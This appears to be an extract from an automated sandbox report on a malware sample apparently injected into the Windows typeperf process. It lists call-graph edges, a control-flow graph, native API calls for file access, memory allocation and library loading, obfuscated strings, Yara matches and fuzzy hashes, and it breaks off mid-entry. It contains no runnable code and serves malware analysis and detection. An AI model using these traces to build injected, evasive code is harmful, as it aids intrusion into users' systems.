3342e80 LdrInitializeThunk 89877->89897 89878->89844 89879 2945033 89879->89844 89882 29448ba 89881->89882 89883 2945f10 LdrLoadDll 89882->89883 89884 29448cb 89883->89884 89898 3342d30 LdrInitializeThunk 89884->89898 89885 293a455 89885->89852 89888 2944471 89887->89888 89889 29444a6 89887->89889 89890 2945f10 LdrLoadDll 89888->89890 89891 2945f10 LdrLoadDll 89889->89891 89892 294448e 89890->89892 89893 29444bc 89891->89893 89892->89858 89899 3342fb0 LdrInitializeThunk 89893->89899 89894 29444cb 89894->89858 89896->89828 89897->89879 89898->89885 89899->89894 89900 2930720 89901 293073a 89900->89901 89902 2933f00 LdrLoadDll 89901->89902 89903 2930758 89902->89903 89904 2940900 LdrLoadDll 89903->89904 89905 293076e 89904->89905 89906 293079d 89905->89906 89907 293078c PostThreadMessageW 89905->89907 89907->89906 89908 293e920 89911 293d5b0 89908->89911 89912 293d5ba 89911->89912 89913 29341e0 LdrLoadDll 89912->89913 89914 293d62d 89913->89914 89915 293d66d 89914->89915 89916 29341e0 LdrLoadDll 89914->89916 89917 2937380 2 API calls 89915->89917 89916->89915 89918 293d751 89917->89918 89919 293d758 89918->89919 89921 293d290 89918->89921 89922 293d2b3 89921->89922 89923 2941aa0 3 API calls 89922->89923 89925 293d2c0 89923->89925 89924 293d312 89924->89918 89925->89924 89926 293d2df 89925->89926 89927 293d31e 89925->89927 89928 293d2e7 89926->89928 89929 293d304 89926->89929 89932 29341e0 LdrLoadDll 89927->89932 89930 2946d20 2 API calls 89928->89930 89931 2946d20 2 API calls 89929->89931 89933 293d2f8 89930->89933 89931->89924 89934 293d340 89932->89934 89933->89918 89935 293c5d0 2 API calls 89934->89935 89936 293d362 89935->89936 89940 293d37a 89936->89940 89941 293d468 89936->89941 89937 293d44f 89938 2946d20 2 API calls 89937->89938 89939 293d573 89938->89939 89939->89918 89940->89937 89944 293cbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89940->89944 89941->89937 89945 293cbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 89941->89945 89944->89940 89945->89941 89946 2944ca0 89947 2944cbe 89946->89947 89948 2944d17 89946->89948 89949 2945f10 LdrLoadDll 89947->89949 89950 2945f10 LdrLoadDll 89948->89950 89952 2944cdb 89949->89952 89951 2944d2d NtCreateFile 89950->89951 89953 2947e60 89954 2946d20 2 API calls 89953->89954 89955 2947e75 89954->89955 89956 2940460 89957 294047c 89956->89957 89968 2944c00 89957->89968 89960 29404a4 89962 2944f10 2 API calls 89960->89962 89961 29404b8 89963 2944f10 2 API calls 89961->89963 89964 29404ad 89962->89964 89965 29404c1 89963->89965 89972 2946e40 LdrLoadDll RtlAllocateHeap 89965->89972 89967 29404cc 89969 2944c1d 89968->89969 89970 2945f10 LdrLoadDll 89969->89970 89971 294049d 89970->89971 89971->89960 89971->89961 89972->89967 89973 293ff27 89974 293feca 89973->89974 89974->89973 89975 293ffca 89974->89975 89989 2944dd0 89974->89989 89977 293fff2 89981 2940009 89977->89981 89996 2944bb0 LdrLoadDll 89977->89996 89979 2940025 89983 2944f10 2 API calls 89979->89983 89980 2940010 89982 2944f10 2 API calls 89980->89982 89981->89979 89981->89980 89984 2940019 89982->89984 89986 294002e 89983->89986 89985 294005a 89986->89985 89987 2946d20 2 API calls 89986->89987 89988 294004e 89987->89988 89990 2944df1 89989->89990 89991 2944e42 89989->89991 89993 2945f10 LdrLoadDll 89990->89993 89992 2945f10 LdrLoadDll 89991->89992 89995 2944e58 NtReadFile 89992->89995 89994 2944e0e 89993->89994 89994->89977 89995->89977 89996->89981 89997 29351a5 89998 2937130 2 API calls 89997->89998 89999 29351d0 89997->89999 89998->89999 90001 29351fc 89999->90001 90002 29370b0 89999->90002 90010 2944240 90002->90010 90004 29370f4 90005 2937115 90004->90005 90017 29443d0 90004->90017 90005->89999 90007 2937105 90008 2937121 90007->90008 90009 2944f10 2 API calls 90007->90009 90008->89999 90009->90005 90011 294425e 90010->90011 90012 294429b 90010->90012 90013 2945f10 LdrLoadDll 90011->90013 90014 2945f10 LdrLoadDll 90012->90014 90015 294427b 90013->90015 90016 29442b1 90014->90016 90015->90004 90016->90004 90018 2944423 90017->90018 90019 29443ee 90017->90019 90021 2945f10 LdrLoadDll 90018->90021 90020 2945f10 LdrLoadDll 90019->90020 90022 294440b 90020->90022 90023 2944439 90021->90023 90022->90007 90026 3344650 LdrInitializeThunk 90023->90026 90024 2944448 90024->90007 90026->90024

                                                                                                                        Executed Functions

                                                                                                                        Function 029299A0 Relevance: 36.7, Strings: 29, Instructions: 460COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 27 29299a0-2929d1d 28 2929d27-2929d2e 27->28 29 2929d53-2929d5d 28->29 30 2929d30-2929d46 28->30 31 2929d6e-2929d77 29->31 32 2929d51 30->32 33 2929d48-2929d4e 30->33 34 2929d84-2929d8b 31->34 35 2929d79-2929d82 31->35 32->28 33->32 37 2929dc2-2929dd3 34->37 38 2929d8d-2929dc0 34->38 35->31 39 2929de4-2929dee 37->39 38->34 40 2929df0-2929e02 39->40 41 2929e04-2929e0b 39->41 40->39 43 2929e3d-2929e44 41->43 44 2929e0d-2929e3b 41->44 45 2929e46-2929e83 43->45 46 2929e85-2929e8f 43->46 44->41 45->43 47 2929ea0-2929ea9 46->47 48 2929eab-2929ebd 47->48 49 2929ebf-2929ec6 47->49 48->47 51 2929ec8-2929eeb 49->51 52 2929eed 49->52 51->49 53 2929ef4-2929efb 52->53 54 2929f24-2929f35 53->54 55 2929efd-2929f0e 53->55 58 2929f46-2929f52 54->58 56 2929f10-2929f14 55->56 57 2929f15-2929f17 55->57 56->57 61 2929f22 57->61 62 2929f19-2929f1f 57->62 59 2929f70-2929f77 58->59 60 2929f54-2929f60 58->60 65 2929fa9-2929fb3 59->65 66 2929f79-2929fa7 59->66 63 2929f62-2929f68 60->63 64 2929f6e 60->64 61->53 62->61 63->64 64->58 68 2929fc4-2929fcd 65->68 66->59 69 2929fcf-2929fdb 68->69 70 2929fdd-2929fe1 68->70 69->68 71 2929fe3-292a008 70->71 72 292a00a-292a014 70->72 71->70 74 292a017-292a021 72->74 75 292a023-292a03e 74->75 76 292a05a-292a064 74->76 79 292a040-292a044 75->79 80 292a045-292a047 75->80 77 292a066-292a085 76->77 78 292a098-292a0a1 76->78 83 292a096 77->83 84 292a087-292a090 77->84 85 292a1e1-292a1eb 78->85 86 292a0a7-292a0ae 78->86 79->80 81 292a058 80->81 82 292a049-292a052 80->82 81->74 82->81 83->76 84->83 89 292a1fc-292a205 85->89 87 292a0b0-292a0d3 86->87 88 292a0d5-292a0e8 86->88 87->86 90 292a0f9-292a102 88->90 91 292a223-292a22a 89->91 92 292a207-292a213 89->92 95 292a112-292a121 90->95 96 292a104-292a110 90->96 93 292a276-292a27d 91->93 94 292a22c call 29469b0 91->94 97 292a221 92->97 98 292a215-292a21b 92->98 101 292a2a4-292a2ae 93->101 102 292a27f-292a2a2 93->102 107 292a231-292a235 94->107 103 292a123-292a12d 95->103 104 292a19b-292a1af 95->104 96->90 97->89 98->97 102->93 106 292a13e-292a14a 103->106 108 292a1c0-292a1c9 104->108 109 292a160-292a167 106->109 110 292a14c-292a15e 106->110 107->93 111 292a237-292a258 107->111 112 292a1cb-292a1da 108->112 113 292a1dc 108->113 115 292a199 109->115 116 292a169-292a197 109->116 110->106 117 292a266-292a274 111->117 118 292a25a-292a263 111->118 112->108 113->78 115->85 116->109 117->107 118->117
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !$#W$%v$&,$*$1$5v$6$$9$9$$9D$<N$A$J$M$P$T$V$Vd&,$aE$b$jN$l$p$st$z$|$|G$"
                                                                                                                        • API String ID: 0-826254412
                                                                                                                        • Opcode ID: 7ca78d8483b81ab9a2a14a06c284fad788fca563a91a88537d2f398fc2cb29ea
                                                                                                                        • Instruction ID: df8a64c6aace68eb381ca6833e11e8f8ec8428f472dc415fd7ce0fb5b794a0d3
                                                                                                                        • Opcode Fuzzy Hash: 7ca78d8483b81ab9a2a14a06c284fad788fca563a91a88537d2f398fc2cb29ea
                                                                                                                        • Instruction Fuzzy Hash: 3632DFB0D05228CBEB24CF45C9947DDBBB2BF89308F2084D9D1496B294DBB91A88CF55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0293C010 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0293C0F4
                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0293C12F
                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 0293C13A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction ID: 7602bb5bbc80b7f6dcb8a07f47ef3aa88200685d93301ca48df2431fcd11da5b
                                                                                                                        • Opcode Fuzzy Hash: 7996d9c3c2ef40bdeddb89660e0f03415cd4af35b4098dd8e77b08b45b543974
                                                                                                                        • Instruction Fuzzy Hash: 773194B1900608BBDB25EFA0CC85FFF777D9F94749F104459B908A6180DB70AA859FA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02944CA0 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,000000CA,?,?,?,?,?,?,?), ref: 02944D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction ID: 9b850955f477aa6812e94a121c57cc295e30c3a1f263254a595e068db68df4ec
                                                                                                                        • Opcode Fuzzy Hash: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction Fuzzy Hash: A221BDB2210548ABDB14DE99DC80EEB73AEAF8C714F518208FA1DA7244D630E8518BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02944DD0 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,000000CA,?,?,?,?,?), ref: 02944E81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction ID: fd919b0571f8cbeb9b1ce00e18bc3551ec425b37dfae263a6ffb14399a69f3ff
                                                                                                                        • Opcode Fuzzy Hash: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction Fuzzy Hash: ED21D3B2200509AFDB14DF99DC80EEB73AEEFCC714F008609FA1DE7245D630A9118BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02945040 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02931888,?,02931F99,00000000,00000004,00003000,00000004,00000000,02931F99,?,02931888,02931F99,?), ref: 029450D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction ID: b5eec8b2cc227c92b9e833fe79fe9021e125fe24baea713e1f6da68544609919
                                                                                                                        • Opcode Fuzzy Hash: 8b2e28a8aa5a017478c29436a49175c680399554f77787f91accb6b170530f89
                                                                                                                        • Instruction Fuzzy Hash: 3A1116B6200619BFDB10DE99DC80FAB73AEEFD8714F008509FA1D97245DA34B9118BB5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02944E90 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction ID: cfb6746fe40621b2fe95c7426f3738abc85ba7c099f26ad43f80c0a6dc6b6d81
                                                                                                                        • Opcode Fuzzy Hash: b201e488f55bbf64b3f94a3b9688a55daa12353c9592422b789e308b55fd2678
                                                                                                                        • Instruction Fuzzy Hash: 1801D1712006147FD220EA69DC40FAB736EDFC5324F408519FA1C97241DB3079158BB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02944F10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02944F44
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction ID: 7da970ac7583eab89f5785b80bf517c2a5e9a812a770bb2eb9722257b88d64d4
                                                                                                                        • Opcode Fuzzy Hash: f36375a869f0fb8424eafcbc6dcbcf7c194bcefb1b484bf14c7f1598789658c8
                                                                                                                        • Instruction Fuzzy Hash: E1E08C322006147BD220EA9ACC00FEBB76DEFC5754F418415FA0CA7245CA71BA158BF0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03344340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 5cc9a026be9deccc1d50d846daa082b00b2308831c13e518a6b4347d92ae0c91
                                                                                                                        • Instruction ID: f9a92cf3fe16dcb10b43e9e8f89f499c2a05b7d42e4a21818f76d4aca11c49d7
                                                                                                                        • Opcode Fuzzy Hash: 5cc9a026be9deccc1d50d846daa082b00b2308831c13e518a6b4347d92ae0c91
                                                                                                                        • Instruction Fuzzy Hash: E0900235715804129140B15C48C4946400597E0301B55C011F4424954C8B148A565761
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03344650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: e4b2c4a82e1d4bb839e661598d1f58a9f44949e32143224dab5e8b21f6fd9bcb
                                                                                                                        • Instruction ID: e1e9d55ff3063060d45a8fe96054048ded79cdc2f1d4b3f2956e7e1594119484
                                                                                                                        • Opcode Fuzzy Hash: e4b2c4a82e1d4bb839e661598d1f58a9f44949e32143224dab5e8b21f6fd9bcb
                                                                                                                        • Instruction Fuzzy Hash: 9D900475711504434140F15C4C44C077005D7F13013D5C115F4554D70CC71CCD55D77D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b4d1d072208a522dc0014d76849f9293f1a8f1055ad5b83b2f3daf892f8d3738
                                                                                                                        • Instruction ID: 0d560a11b9a3b04805a64cd9615b2c60b8adc25dffac23ff0f695b54a27cba7c
                                                                                                                        • Opcode Fuzzy Hash: b4d1d072208a522dc0014d76849f9293f1a8f1055ad5b83b2f3daf892f8d3738
                                                                                                                        • Instruction Fuzzy Hash: 90900265312404034105B15C4454A16400A87E0201B55C021F5014990DC62589916525
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 453954c5106518fe294268a22adc6350be20bdf90363d95135f34006791f13b0
                                                                                                                        • Instruction ID: caeecb1e1dd4072ecd5d289c81a3c8acc2ded2264ab2b5a8a6c52403a5a3b906
                                                                                                                        • Opcode Fuzzy Hash: 453954c5106518fe294268a22adc6350be20bdf90363d95135f34006791f13b0
                                                                                                                        • Instruction Fuzzy Hash: F090023571540C02D150B15C4454B46000587D0301F55C011B4024A54D87558B557AA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 697fc1f2e1497061683799418ac0d31b4c47a2029e8832825b399882c67ca944
                                                                                                                        • Instruction ID: 962726042264a1f73f6a131fb56e1e57ced3ae1b30cc48294e4ba002461413f5
                                                                                                                        • Opcode Fuzzy Hash: 697fc1f2e1497061683799418ac0d31b4c47a2029e8832825b399882c67ca944
                                                                                                                        • Instruction Fuzzy Hash: 7390023531140C02D180B15C4444A4A000587D1301F95C015B4025A54DCB158B597BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6a62a3b2a91f21b9fbac883a8b8d1e89ee7b6fcb8f2e271f9ea0759660b990c1
                                                                                                                        • Instruction ID: ca87e667a504a7f24aec59ef54776eb3bfe09980f26c8f1d2aa5179279726a1a
                                                                                                                        • Opcode Fuzzy Hash: 6a62a3b2a91f21b9fbac883a8b8d1e89ee7b6fcb8f2e271f9ea0759660b990c1
                                                                                                                        • Instruction Fuzzy Hash: BC90023531544C42D140B15C4444E46001587D0305F55C011B4064A94D97258E55BA61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: f9a724493c97dd441a48f6e8afbc58648774ef30c31b8f65a686447db29d83db
                                                                                                                        • Instruction ID: c90cd8501bcf20db131b3d0ecf39d4e0e2cfcf379e23ebf5189b6f7d94590aa7
                                                                                                                        • Opcode Fuzzy Hash: f9a724493c97dd441a48f6e8afbc58648774ef30c31b8f65a686447db29d83db
                                                                                                                        • Instruction Fuzzy Hash: A5900229331404020145F55C064490B044597D6351395C015F5416990CC72189655721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 2338685e61d1ca29a6c832cc0705ecf737234a099a0cc3024f3b4533920434fd
                                                                                                                        • Instruction ID: 1da746ab706ae97aee74044787a0a2bf5605eae5febec2c0b395b6237b3d8ae1
                                                                                                                        • Opcode Fuzzy Hash: 2338685e61d1ca29a6c832cc0705ecf737234a099a0cc3024f3b4533920434fd
                                                                                                                        • Instruction Fuzzy Hash: 1190043D331404030105F55C0744D070047C7D5351355C031F5015D50CD731CD715531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
